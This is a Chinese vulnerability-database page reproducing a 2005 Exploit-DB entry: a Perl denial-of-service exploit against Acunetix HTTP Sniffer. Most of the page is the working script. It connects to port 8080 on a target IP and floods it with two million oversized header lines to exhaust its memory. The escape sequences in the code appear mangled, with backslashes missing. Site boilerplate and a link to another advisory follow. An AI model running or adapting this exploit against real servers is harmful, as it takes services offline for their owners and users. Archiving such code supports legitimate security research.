Acunetix HTTP Sniffer – Denial of Service

Acunetix HTTP Sniffer – Denial of Service

漏洞ID 1055324 漏洞类型
发布时间 2005-08-05 更新时间 2005-08-05
图片[1]-Acunetix HTTP Sniffer – Denial of Service-安全小百科CVE编号 N/A
图片[2]-Acunetix HTTP Sniffer – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1137
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
#
#  Acunetix HTTP Sniffer DOS Exploit
# ------------------------------------
#  Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: www.acunetix.com

$ARGC=@ARGV;
if ($ARGC !=2) {
   print "n";
   print "  Acunetix HTTP Sniffer DOS Exploitn";
   print "-------------------------------------nn";
   print "Usage: $0 [remote IP] n";
   print "Exam: $0 127.0.0.1n";
   exit;
}

use IO::Socket::INET;

$host=$ARGV[0];
$port= "8080";

print "n";
print "[+] Connect to $host..n";
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp')
|| die "[-] Connection error$@n";
print "[+] Connectedn";
sleep(1);

print "[+] Build buffer..n";
sleep(1);
$hostname="Host: $host";
$bufy='A'x50;
$bufa='A'x8183;
$len=length($bufy);
$buff="GET / HTTP/1.1rn";
sleep(1);

print "[+] Sending request..n";
send($sock,$buff,0) || die "[-] send error:$@n";
print "[+] Send DOS..";
for($i= 0; $i < 2000000; $i++)
{
$buff=" $bufarn";
send($sock,$buff,0) || die "send error:$@n[*] Check if server D0s'edn";
}

$buff="$hostnamern";
$buff.="Content-Length: $lenrn";
$buff.="rn";
$buff.=$bufy."rnrn";

print "[+] Now kill the process..n";
send($sock,$buff,0) || die "[-] send error:$@n";
print "[+] DONE..Server Out of Memoryn";
close($sock);

# milw0rm.com [2005-08-05]

相关推荐: Microsoft Excel 97 / 2000 Register.ID Vulnerability

Microsoft Excel 97 / 2000 Register.ID Vulnerability 漏洞ID 1103953 漏洞类型 Access Validation Error 发布时间 2000-07-11 更新时间 2000-07-11 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享